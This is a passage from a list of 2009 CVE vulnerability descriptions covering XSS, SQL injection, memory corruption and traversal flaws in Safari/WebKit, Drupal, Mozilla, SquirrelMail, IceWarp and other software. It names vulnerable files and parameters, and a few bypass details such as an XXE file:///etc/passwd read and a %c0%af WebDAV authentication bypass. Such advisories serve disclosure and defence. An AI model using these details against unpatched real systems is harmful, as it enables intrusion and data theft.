administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. [CVE-2009-1849] Cross-site scripting (XSS) vulnerability in the Monitor_Bandwidth function in PRTG Traffic Grapher 6.2.2.977 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-1845] Cross-site scripting (XSS) vulnerability in ajax/updatecheck.php in Lussumo Vanilla 1.1.5 and 1.1.7 allows remote attackers to inject arbitrary web script or HTML via the RequestName parameter. [CVE-2009-1844] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 5.x before 5.18 and 6.x before 6.12 allow (1) remote authenticated users to inject arbitrary web script or HTML via crafted UTF-8 byte sequences that are treated as UTF-7 by Internet Explorer 6 and 7, which are not properly handled in the "HTML exports of books" feature [CVE-2009-1843] Multiple SQL injection vulnerabilities in Flash Quiz Beta 2 allow remote attackers to execute arbitrary SQL commands via the (1) quiz parameter to (a) num_questions.php, (b) answers.php, (c) high_score.php, (d) high_score_web.php, (e) results_table_web.php, and (f) question.php [CVE-2009-1841] js/src/xpconnect/src/xpcwrappedjsclass.cpp in Mozilla Firefox before 3.0.11, Thunderbird before 2.0.0.22, and SeaMonkey before 1.1.17 allows remote attackers to execute arbitrary web script with the privileges of a chrome object, as demonstrated by the browser sidebar and the FeedWriter. [CVE-2009-1840] Mozilla Firefox before 3.0.11, Thunderbird, and SeaMonkey do not check content policy before loading a script file into a XUL document, which allows remote attackers to bypass intended access restrictions via a crafted HTML document, as demonstrated by a "web bug" in an e-mail message, or web script or an advertisement in a web page. [CVE-2009-1836] Mozilla Firefox before 3.0.11, Thunderbird before 2.0.0.22, and SeaMonkey before 1.1.17 use the HTTP Host header to determine the context of a document provided in a non-200 CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack. [CVE-2009-1823] Cross-site scripting (XSS) vulnerability in the Print (aka Printer, e-mail and PDF versions) module 5.x before 5.x-4.7 and 6.x before 6.x-1.7, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML by modifying a document head, before the Content-Type META element, to contain crafted UTF-8 byte sequences that are treated as UTF-7 by Internet Explorer 6 and 7, a related issue to CVE-2009-1575. [CVE-2009-1821] DMXReady Registration Manager 1.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for databases/webblogmanager.mdb. [CVE-2009-1820] Cross-site scripting (XSS) vulnerability in product.php in 2daybiz Custom T-shirt Design Script allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2009-1811] Multiple cross-site scripting (XSS) vulnerabilities in myGesuad 0.9.14 (aka 0.9) allow remote attackers to inject arbitrary web script or HTML via (1) the Page parameter in a List action to modules/ereignis.php, (2) the Kontext parameter in a Search action to modules/kategorie.php, (3) the image parameter to modules/image.php, or (4) the ID parameter in a Detail action to modules/sitzung.php. [CVE-2009-1809] Multiple cross-site scripting (XSS) vulnerabilities in myColex 1.4.2 allow remote attackers to inject arbitrary web script or HTML via (1) the year parameter to modules/kalender.php, (2) the Page parameter in a List action to modules/ereignis.php, (3) the Kontext parameter in a Search action to modules/kategorie.php, or (4) the image parameter to modules/image.php. [CVE-2009-1801] Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.5.1, and other 2.4.x, 2.5.x, and pre-release 2.6.x versions, allow remote attackers to inject arbitrary web script or HTML via the (1) display parameter to reports.php, the (2) order and (3) extdisplay parameters to config.php, and the (4) sort parameter to recordings/index.php. NOTE: some of these details are obtained from third party information. [CVE-2009-1798] Multiple cross-site scripting (XSS) vulnerabilities on the Network Management Card (NMC) on American Power Conversion (APC) Switched Rack PDU (aka Rack Mount Power Distribution) devices and other devices allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the login_username vector for Forms/login1 is already covered by CVE-2009-4406. [CVE-2009-1796] Cross-site scripting (XSS) vulnerability in Sun Java System Portal Server 6.3.1, 7.1, and 7.2 allows remote attackers to inject arbitrary web script or HTML via vectors related to an error page. [CVE-2009-1792] The system.openURL function in StoneTrip Ston3D StandalonePlayer (aka S3DPlayer StandAlone) 1.6.2.4 and 1.7.0.1 and WebPlayer (aka S3DPlayer Web) 1.6.0.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the first argument (the sURL argument). [CVE-2009-1790] Cross-site scripting (XSS) vulnerability in CGI RESCUE Trees before 2.11 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2009-1787] Multiple SQL injection vulnerabilities in PHP Dir Submit (aka WebsiteSubmitter and Submitter Script) allow remote attackers to bypass authentication and gain administrative access via the (1) username and (2) password parameters. [CVE-2009-1785] Cross-site scripting (XSS) vulnerability in Ulteo Open Virtual Desktop 1.0 allows remote attackers to inject arbitrary web script or HTML via the error parameter to header.php. NOTE: the provenance of this information is unknown [CVE-2009-1776] Multiple cross-site scripting (XSS) vulnerabilities in FormMail.pl in Matt Wright FormMail 1.92, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via javascript: URIs in the (1) request and (2) return_link_url parameters. [CVE-2009-1775] Multiple cross-site scripting (XSS) vulnerabilities in Ulteo Open Virtual Desktop 1.0 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) admin/applications.php, (2) admin/appsgroup.php, (3) admin/users.php, (4) admin/usersgroup.php, and (5) admin/tasks.php [CVE-2009-1772] Cross-site scripting (XSS) vulnerability in activeCollab 2.1 Corporate allows remote attackers to inject arbitrary web script or HTML via the re_route parameter to the login script. [CVE-2009-1762] Multiple cross-site scripting (XSS) vulnerabilities in the WebAccess login page (aka gw/webacc) in Novell GroupWise 7.x before 7.03 HP2 allow remote attackers to inject arbitrary web script or HTML via the (1) GWAP.version or (2) User.Theme (aka User.Theme.index) parameter. [CVE-2009-1751] SQL injection vulnerability in list_list.php in Realty Webware Technologies Web-Base 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2009-1749] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Catviz 0.4.0 beta 1 allow remote attackers to inject arbitrary web script or HTML via the (1) userman_form and (2) webpages_form parameters. [CVE-2009-1748] Multiple directory traversal vulnerabilities in index.php in Catviz 0.4.0 Beta 1 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) webpages_form or (2) userman_form parameter. [CVE-2009-1745] Armorlogic Profense Web Application Firewall before 2.2.22, and 2.4.x before 2.4.4, has a default root password hash, and permits password-based root logins over SSH, which makes it easier for remote attackers to obtain access. [CVE-2009-1738] Cross-site scripting (XSS) vulnerability in Feed Block 6.x-1.x before 6.x-1.1, a module for Drupal, allows remote authenticated users with administrator feed permissions to inject arbitrary web script or HTML via unspecified vectors in "aggregator items." [CVE-2009-1735] Cross-site scripting (XSS) vulnerability in search.php in VidSharePro allows remote attackers to inject arbitrary web script or HTML via the searchtxt parameter. NOTE: some of these details are obtained from third party information. [CVE-2009-1732] Cross-site scripting (XSS) vulnerability in admin/usermanager in IPplan 4.91a allows remote attackers to inject arbitrary web script or HTML via the grp parameter. [CVE-2009-1729] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Communications Express 6 2005Q4 (aka 6.2) and 6.3 allow remote attackers to inject arbitrary web script or HTML via (1) the abperson_displayName parameter to uwc/abs/search.xml in the Add Contact implementation in the Personal Address Book component or (2) the temporaryCalendars parameter to uwc/base/UWCMain. [CVE-2009-1727] Incomplete blacklist vulnerability in CoreTypes in Apple Mac OS X 10.5 before 10.5.8 makes it easier for user-assisted remote attackers to execute arbitrary JavaScript via a web page that offers a download with a Content-Type value that is not on the list of possibly unsafe content types for Safari. [CVE-2009-1725] WebKit in Apple Safari before 4.0.2, as used on iPhone OS before 3.1, iPhone OS before 3.1.1 for iPod touch, and other platforms [CVE-2009-1724] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0.2, as used on iPhone OS before 3.1, iPhone OS before 3.1.1 for iPod touch, and other platforms, allows remote attackers to inject arbitrary web script or HTML via vectors related to parent and top objects. [CVE-2009-1723] CFNetwork in Apple Mac OS X 10.5 before 10.5.8 places an incorrect URL in a certificate warning in certain 302 redirection scenarios, which makes it easier for remote attackers to trick a user into visiting an arbitrary https web site by leveraging an open redirect vulnerability, a different issue than CVE-2009-2062. [CVE-2009-1718] WebKit in Apple Safari before 4.0 allows user-assisted remote attackers to obtain sensitive information via vectors involving drag events and the dragging of content over a crafted web page. [CVE-2009-1715] Cross-site scripting (XSS) vulnerability in Web Inspector in WebKit in Apple Safari before 4.0 allows user-assisted remote attackers to inject arbitrary web script or HTML, and read local files, via vectors related to script execution with incorrect privileges. [CVE-2009-1714] Cross-site scripting (XSS) vulnerability in Web Inspector in WebKit in Apple Safari before 4.0 allows user-assisted remote attackers to inject arbitrary web script or HTML, and read local files, via vectors related to the improper escaping of HTML attributes. [CVE-2009-1713] The XSLT functionality in WebKit in Apple Safari before 4.0 does not properly implement the document function, which allows remote attackers to read (1) arbitrary local files and (2) files from different security zones via unspecified vectors. [CVE-2009-1712] WebKit in Apple Safari before 4.0 does not prevent remote loading of local Java applets, which allows remote attackers to execute arbitrary code, gain privileges, or obtain sensitive information via an APPLET or OBJECT element. [CVE-2009-1711] WebKit in Apple Safari before 4.0 does not properly initialize memory for Attr DOM objects, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. [CVE-2009-1710] WebKit in Apple Safari before 4.0 allows remote attackers to spoof the browser's display of (1) the host name, (2) security indicators, and unspecified other UI elements via a custom cursor in conjunction with a modified CSS3 hotspot property. [CVE-2009-1709] Use-after-free vulnerability in the garbage-collection implementation in WebCore in WebKit in Apple Safari before 4.0 allows remote attackers to execute arbitrary code or cause a denial of service (heap corruption and application crash) via an SVG animation element, related to SVG set objects, SVG marker elements, the targetElement attribute, and unspecified "caches." [CVE-2009-1708] Apple Safari before 4.0 does not prevent calls to the open-help-anchor URL handler by web sites, which allows remote attackers to open arbitrary local help files, and execute arbitrary code or obtain sensitive information, via a crafted call. [CVE-2009-1707] Race condition in the Reset Safari implementation in Apple Safari before 4.0 on Windows might allow local users to read stored web-site passwords via unspecified vectors. [CVE-2009-1706] The Private Browsing feature in Apple Safari before 4.0 on Windows does not remove cookies from the alternate cookie store in unspecified circumstances upon (1) disabling of the feature or (2) exit of the application, which makes it easier for remote web servers to track users via a cookie. [CVE-2009-1703] WebKit in Apple Safari before 4.0 does not prevent references to file: URLs within (1) audio and (2) video elements, which allows remote attackers to determine the existence of arbitrary files via a crafted HTML document. [CVE-2009-1702] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to improper handling of Location and History objects. [CVE-2009-1701] Use-after-free vulnerability in the JavaScript DOM implementation in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) by destroying a document.body element that has an unspecified XML container with elements that support the dir attribute. [CVE-2009-1700] The XSLT implementation in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle redirects, which allows remote attackers to read XML content from arbitrary web pages via a crafted document. [CVE-2009-1699] The XSL stylesheet implementation in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle XML external entities, which allows remote attackers to read arbitrary files via a crafted DTD, as demonstrated by a file:///etc/passwd URL in an entity declaration, related to an "XXE attack." [CVE-2009-1698] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not initialize a pointer during handling of a Cascading Style Sheets (CSS) attr function call with a large numerical argument, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document. [CVE-2009-1697] CRLF injection vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject HTTP headers and bypass the Same Origin Policy via a crafted HTML document, related to cross-site scripting (XSS) attacks that depend on communication with arbitrary web sites on the same server through use of XMLHttpRequest without a Host header. [CVE-2009-1696] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 uses predictable random numbers in JavaScript applications, which makes it easier for remote web servers to track the behavior of a Safari user during a session. [CVE-2009-1695] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving access to frame contents after completion of a page transition. [CVE-2009-1694] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle redirects, which allows remote attackers to read images from arbitrary web sites via vectors involving a CANVAS element and redirection, related to a "cross-site image capture issue." [CVE-2009-1693] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to read images from arbitrary web sites via a CANVAS element with an SVG image, related to a "cross-site image capture issue." [CVE-2009-1692] WebKit before r41741, as used in Apple iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1 through 2.2.1, Safari, and other software, allows remote attackers to cause a denial of service (memory consumption or device reset) via a web page containing an HTMLSelectElement object with a large length attribute, related to the length property of a Select object. [CVE-2009-1691] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to insufficient access control for standard JavaScript prototypes in other domains. [CVE-2009-1690] Use-after-free vulnerability in WebKit, as used in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1 through 2.2.1, Google Chrome 1.0.154.53, and possibly other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) by setting an unspecified property of an HTML tag that causes child elements to be freed and later accessed when an HTML error occurs, related to "recursion in certain DOM event handlers." [CVE-2009-1689] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving submission of a form to the about:blank URL, leading to security-context replacement. [CVE-2009-1688] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via vectors related to determining a security context through an approach that is not the "HTML 5 standard method." [CVE-2009-1687] The JavaScript garbage collector in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle allocation failures, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document that triggers write access to an "offset of a NULL pointer." [CVE-2009-1686] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not properly handle constant (aka const) declarations in a type-conversion operation during JavaScript exception handling, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document. [CVE-2009-1685] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML by overwriting the document.implementation property of (1) an embedded document or (2) a parent document. [CVE-2009-1684] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via an event handler that triggers script execution in the context of the next loaded document. [CVE-2009-1681] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not prevent web sites from loading third-party content into a subframe, which allows remote attackers to bypass the Same Origin Policy and conduct "clickjacking" attacks via a crafted HTML document. [CVE-2009-1658] Multiple SQL injection vulnerabilities in admin/admin.php in Realty Webware Technologies Realty Web-Base 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) user (username) and (2) password parameters. NOTE: some of these details are obtained from third party information. [CVE-2009-1654] Cross-site scripting (XSS) vulnerability in questiondetail.php in Easy Scripts Answer and Question Script allows remote attackers to inject arbitrary web script or HTML via the questionid parameter. [CVE-2009-1635] Multiple cross-site scripting (XSS) vulnerabilities in the WebAccess component in Novell GroupWise 7.x before 7.03 HP3 and 8.x before 8.0 HP2 allow remote attackers to inject arbitrary web script or HTML via (1) the User.lang parameter to the login page (aka gw/webacc), (2) style expressions in a message that contains an HTML file, or (3) vectors associated with incorrect protection mechanisms against scripting, as demonstrated using whitespace between JavaScript event names and values. [CVE-2009-1634] The WebAccess component in Novell GroupWise 7.x before 7.03 HP3 and 8.x before 8.0 HP2 does not properly implement session management mechanisms, which allows remote attackers to gain access to user accounts via unspecified vectors. [CVE-2009-1623] Cross-site scripting (XSS) vulnerability in index.php in Dew-NewPHPLinks 2.0 allows remote attackers to inject arbitrary web script or HTML via the PID parameter. [CVE-2009-1620] Multiple cross-site scripting (XSS) vulnerabilities in input.php in MataChat allow remote attackers to inject arbitrary web script or HTML via the (1) nickname and (2) color parameters. [CVE-2009-1616] Cross-site scripting (XSS) vulnerability in docs/showdoc.php in Coppermine Photo Gallery (CPG) before 1.4.22 allows remote attackers to inject arbitrary web script or HTML via the css parameter, a different vector than CVE-2008-0505. [CVE-2009-1614] Multiple cross-site scripting (XSS) vulnerabilities in Leap CMS 0.1.4 allow remote attackers to inject arbitrary web script or HTML via (1) the msg parameter (aka the message in an article comment) or (2) the searchterm parameter (aka the search post form). NOTE: some of these details are obtained from third party information. [CVE-2009-1607] Cross-site scripting (XSS) vulnerability in the administrator panel in phpForm.net LinkBase 2.0 allows remote attackers to inject arbitrary web script or HTML via the username in a registration, which is not properly handled when the administrator accesses the Users menu. [CVE-2009-1600] Apple Safari executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits PDF uploads by untrusted users, and therefore has a shared document.domain between the web site and this javascript: URI. NOTE: the researcher reports that Adobe's position is "a PDF file is active content." [CVE-2009-1599] Opera executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits PDF uploads by untrusted users, and therefore has a shared document.domain between the web site and this javascript: URI. NOTE: the researcher reports that Adobe's position is "a PDF file is active content." [CVE-2009-1598] Google Chrome executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits PDF uploads by untrusted users, and therefore has a shared document.domain between the web site and this javascript: URI. NOTE: the researcher reports that Adobe's position is "a PDF file is active content." [CVE-2009-1597] Mozilla Firefox executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits PDF uploads by untrusted users, and therefore has a shared document.domain between the web site and this javascript: URI. NOTE: the researcher reports that Adobe's position is "a PDF file is active content." [CVE-2009-1594] Armorlogic Profense Web Application Firewall before 2.2.22, and 2.4.x before 2.4.4, does not properly implement the "positive model," which allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline), as demonstrated by a %0A in a cross-site scripting (XSS) attack URL. [CVE-2009-1593] Armorlogic Profense Web Application Firewall before 2.2.22, and 2.4.x before 2.4.4, does not properly implement the "negative model," which allows remote attackers to conduct cross-site scripting (XSS) attacks via a modified end tag of a SCRIPT element. [CVE-2009-1591] CRLF injection vulnerability in CGI RESCUE Web Mailer before 1.04 allows remote attackers to inject arbitrary HTTP headers, and conduct cross-site scripting (XSS) or HTTP response splitting attacks, via CRLF sequences in an unspecified web form. [CVE-2009-1590] Unspecified vulnerability in CGI RESCUE FORM2MAIL before 1.42 allows remote attackers to send email to arbitrary recipients via a web form. [CVE-2009-1588] Cross-site scripting (XSS) vulnerability in CGI RESCUE MiniBBS 8t before 8.95t, 8 before 8.95, 9 before 9.08, and 10 before 10.32 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-1583] Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form [CVE-2009-1581] functions/mime.php in SquirrelMail before 1.4.18 does not protect the application's content from Cascading Style Sheets (CSS) positioning in HTML e-mail messages, which allows remote attackers to spoof the user interface, and conduct cross-site scripting (XSS) and phishing attacks, via a crafted message. [CVE-2009-1580] Session fixation vulnerability in SquirrelMail before 1.4.18 allows remote attackers to hijack web sessions via a crafted cookie. [CVE-2009-1578] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail before 1.4.18 and NaSMail before 1.7 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) certain encrypted strings in e-mail headers, related to contrib/decrypt_headers.php [CVE-2009-1575] Cross-site scripting (XSS) vulnerability in Drupal 5.x before 5.17 and 6.x before 6.11, as used in vbDrupal before 5.17.0, allows remote attackers to inject arbitrary web script or HTML via crafted UTF-8 byte sequences before the Content-Type meta tag, which are treated as UTF-7 by Internet Explorer 6 and 7. [CVE-2009-1557] Multiple cross-site scripting (XSS) vulnerabilities on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allow remote attackers to inject arbitrary web script or HTML via the next_file parameter to (1) main.cgi, (2) img/main.cgi, or (3) adm/file.cgi [CVE-2009-1554] Cross-site scripting (XSS) vulnerability in ThemeServlet.java in Sun Woodstock 4.2, as used in Sun GlassFish Enterprise Server and other products, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 string in the PATH_INFO, which is displayed on the 404 error page, as demonstrated by the PATH_INFO to theme/META-INF. [CVE-2009-1553] Multiple cross-site scripting (XSS) vulnerabilities in the Admin Console in Sun GlassFish Enterprise Server 2.1 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) applications/applications.jsf, (2) configuration/configuration.jsf, (3) customMBeans/customMBeans.jsf, (4) resourceNode/resources.jsf, (5) sysnet/registration.jsf, or (6) webService/webServicesGeneral.jsf [CVE-2009-1551] Multiple PHP remote file inclusion vulnerabilities in Qt quickteam 2 allow remote attackers to execute arbitrary PHP code via a URL in the (1) qte_web_path parameter to qte_web.php and the (2) qte_root parameter to bin/qte_init.php. [CVE-2009-1535] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122. [CVE-2009-1534] Buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2000 Web Components SP3, Office XP Web Components SP3, BizTalk Server 2002, and Visual Studio .NET 2003 SP1 allows remote attackers to execute arbitrary code via crafted property values, aka "Office Web Components Buffer Overflow Vulnerability." [CVE-2009-1524] Cross-site scripting (XSS) vulnerability in Mort Bay Jetty before 6.1.17 allows remote attackers to inject arbitrary web script or HTML via a directory listing request containing a [CVE-2009-1520] Buffer overflow in the Web GUI in the IBM Tivoli Storage Manager (TSM) client 5.1.0.0 through 5.1.8.2, 5.2.0.0 through 5.2.5.3, 5.3.0.0 through 5.3.6.4, 5.4.0.0 through 5.4.2.6, and 5.5.0.0 through 5.5.1.17 allows attackers to cause a denial of service (application crash) or execute arbitrary code via unspecified vectors. [CVE-2009-1516] Stack-based buffer overflow in the IceWarpServer.APIObject ActiveX control in api.dll in IceWarp Merak Mail Server 9.4.1 might allow context-dependent attackers to execute arbitrary code via a large value in the second argument to the Base64FileEncode method, as possibly demonstrated by a web application that accepts untrusted input for this method. [CVE-2009-1501] Cross-site scripting (XSS) vulnerability in the Exif module 5.x-1.x before 5.x-1.2 and 6.x-1.x-dev before April 13, 2009, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via EXIF tags in an image. [CVE-2009-1495] Web File Explorer 3.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for data/db.mdb. [CVE-2009-1482] Multiple cross-site scripting (XSS) vulnerabilities in action/AttachFile.py in MoinMoin 1.8.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) an AttachFile sub-action in the error_msg function or (2) multiple vectors related to package file errors in the upload_form function, different vectors than CVE-2009-0260. [CVE-2009-1469] CRLF injection vulnerability in the Forgot Password implementation in server/webmail.php in IceWarp eMail Server and WebMail Server before 9.4.2 makes it easier for remote attackers to trick a user into disclosing credentials via CRLF sequences preceding a Reply-To header in the subject element of an XML document, as demonstrated by triggering an e-mail message from the server that contains a user's correct credentials, and requests that the user compose a reply that includes this message. [CVE-2009-1468] Multiple SQL injection vulnerabilities in the search form in server/webmail.php in the Groupware component in IceWarp eMail Server and WebMail Server before 9.4.2 allow remote authenticated users to execute arbitrary SQL commands via the (1) sql and (2) order_by elements in an XML search query. [CVE-2009-1467] Multiple cross-site scripting (XSS) vulnerabilities in IceWarp eMail Server and WebMail Server before 9.4.2 allow remote attackers to inject arbitrary web script or HTML via (1) the body of a message, related to the email view and incorrect HTML filtering in the cleanHTML function in server/inc/tools.php [CVE-2009-1461] Cross-site scripting (XSS) vulnerability in the Create New Page form in razorCMS 0.3 RC2 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the Page Title field. [CVE-2009-1459] Cross-site request forgery (CSRF) vulnerability in razorCMS before 0.4 allows remote attackers to hijack the authentication of administrators for requests that create a web page containing PHP code. [CVE-2009-1458] Multiple cross-site scripting (XSS) vulnerabilities in admin/index.php in razorCMS before 0.4 allow remote attackers to inject arbitrary web script or HTML via (1) the slab parameter in an edit action, (2) the catname parameter in a showcats action, and (3) the cat parameter in a reordercat action. [CVE-2009-1457] Cross-site scripting (XSS) vulnerability in player.php in Nuke Evolution Xtreme 2.x allows remote attackers to inject arbitrary web script or HTML via the defaultVisualExt parameter. NOTE: the provenance of this information is unknown [CVE-2009-1455] Multiple cross-site request forgery (CSRF) vulnerabilities in WebCollab before 2.50 (aka Billy Goat) allow remote attackers to hijack the authentication of administrators for requests that change an arbitrary password or have other unspecified impact. [CVE-2009-1454] Cross-site scripting (XSS) vulnerability in tasks.php in WebCollab before 2.50 (aka Billy Goat) allows remote attackers to inject arbitrary web script or HTML via the selection parameter in a todo action. [CVE-2009-1451] Cross-site scripting (XSS) vulnerability in startpage.php in SMA-DB 0.3.12 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2009-1448] Cross-site scripting (XSS) vulnerability in apricot.php in LovPop.net APRICOT, probably 1.20, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2009-1445] Multiple directory traversal vulnerabilities in WebPortal CMS 0.8-beta allow remote attackers to (1) read arbitrary files via directory traversal sequences in the lang parameter to libraries/helpdocs/help.php and (2) include and execute arbitrary local files via directory traversal sequences in the error parameter to index.php. [CVE-2009-1444] PHP remote file inclusion vulnerability in indexk.php in WebPortal CMS 0.8-beta allows remote attackers to execute arbitrary PHP code via a URL in the lib_path parameter. [CVE-2009-1436] The db interface in libc in FreeBSD 6.3, 6.4, 7.0, 7.1, and 7.2-PRERELEASE does not properly initialize memory for Berkeley DB 1.85 database structures, which allows local users to obtain sensitive information by reading a database file. [CVE-2009-1428] Multiple cross-site scripting (XSS) vulnerabilities in ccLgView.exe in the Symantec Log Viewer, as used in Symantec AntiVirus (SAV) before 10.1 MR8, Symantec Endpoint Protection (SEP) 11.0 before 11.0 MR1, Norton 360 1.0, and Norton Internet Security 2005 through 2008, allow remote attackers to inject arbitrary web script or HTML via a crafted e-mail message, related to "two parsing errors." [CVE-2009-1418] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 3.0.1.73 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-1413] Google Chrome 1.0.x does not cancel timeouts upon a page transition, which makes it easier for attackers to conduct Universal XSS attacks by calling setTimeout to trigger future execution of JavaScript code, and then modifying document.location to arrange for JavaScript execution in the context of an arbitrary web site. NOTE: this can be leveraged for a remote attack by exploiting a chromehtml: argument-injection vulnerability. [CVE-2009-1412] Argument injection vulnerability in the chromehtml: protocol handler in Google Chrome before 1.0.154.59, when invoked by Internet Explorer, allows remote attackers to determine the existence of files, and open tabs for URLs that do not satisfy the IsWebSafeScheme restriction, via a web page that sets document.location to a chromehtml: value, as demonstrated by use of a (1) javascript: or (2) data: URL. NOTE: this can be leveraged for Universal XSS by exploiting certain behavior involving persistence across page transitions. [CVE-2009-1408] Cross-site scripting (XSS) vulnerability in webSPELL 4.2.0c allows remote attackers to inject arbitrary web script or HTML allows remote attackers to inject arbitrary web script or HTML via Javascript events such as onmouseover in nested BBcode tags, as demonstrated using (1) email, (2) img, and (3) url tags. [CVE-2009-1380] Cross-site scripting (XSS) vulnerability in JMX-Console in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP08 and 4.3 before 